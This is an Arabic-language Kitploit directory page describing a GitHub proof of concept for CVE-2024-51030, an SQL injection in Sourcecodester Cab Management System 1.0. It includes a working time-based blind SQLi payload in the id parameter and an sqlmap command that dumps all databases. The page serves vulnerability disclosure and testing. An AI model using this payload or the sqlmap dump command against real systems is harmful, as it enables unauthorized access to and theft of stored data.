Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-51030 — إثبات مفهوم لاستغلال حقن SQL في نظام إدارة سيارات الأجرة Sourcecodester Cab Management System 1.0، يوضح تنفيذ استعلامات SQL عشوائية عبر معامل id في ملفي manage_client.php و view_cab.php. | Kitploit
أدوات/GitHubGitHub/vighneshnair7/cve-2024-51030
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

إثبات مفهوم لاستغلال حقن SQL في نظام إدارة سيارات الأجرة Sourcecodester Cab Management System 1.0، يوضح تنفيذ استعلامات SQL عشوائية عبر معامل id في ملفي manage_client.php و view_cab.php.

عرض المستودع
23منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-51030

الوصف

تسمح ثغرة حقن SQL في ملفي manage_client.php و view_cab.php من Sourcecodester Cab Management System 1.0 للمهاجمين عن بُعد بتنفيذ أوامر SQL عشوائية عبر المعامل id، مما يؤدي إلى وصول غير مصرح به واحتمال اختراق البيانات الحساسة داخل قاعدة البيانات.

نوع الثغرة

حقن SQL

بائع المنتج

Sourcecodester

قاعدة الكود للمنتج المتأثر:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

المكوّن المتأثر:

Sourcecodester Cab Management System v1.0 عرضة لحقن SQL عبر المعامل id في صفحتي manage_client.php و view_cab.php.

نواقل الهجوم:

  1. قم بإعداد التطبيق محليًا وسجّل الدخول باستخدام بيانات اعتماد المسؤول الافتراضية المتوفرة، أو يمكنك أيضًا تسجيل الدخول باستخدام مستخدم إداري بصلاحيات منخفضة مثل (staff).
  2. الآن، انتقل إلى عنوان URL التالي في متصفحك: http://localhost/cms/admin/?page=clients/manage_client&id=1
  3. حقن حمولة SQL: قم بتعديل المعامل id في عنوان URL ليتضمن حمولة حقن SQL عمياء قائمة على القيم المنطقية أو عمياء قائمة على الوقت:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  4. لاحظ استجابة التطبيق: يجب أن يستغرق تحميل الصفحة وقتًا أطول بشكل ملحوظ (5 ثوانٍ) إذا نجح الحقن، مما يؤكد أن المعامل id عرضة لحقن SQL.
  5. الآن استخدم أداة SQLMap لمزيد من الاستغلال واستخراج قواعد البيانات باستخدام الأمر التالي: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump

المراجع:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
تنزيل الأداة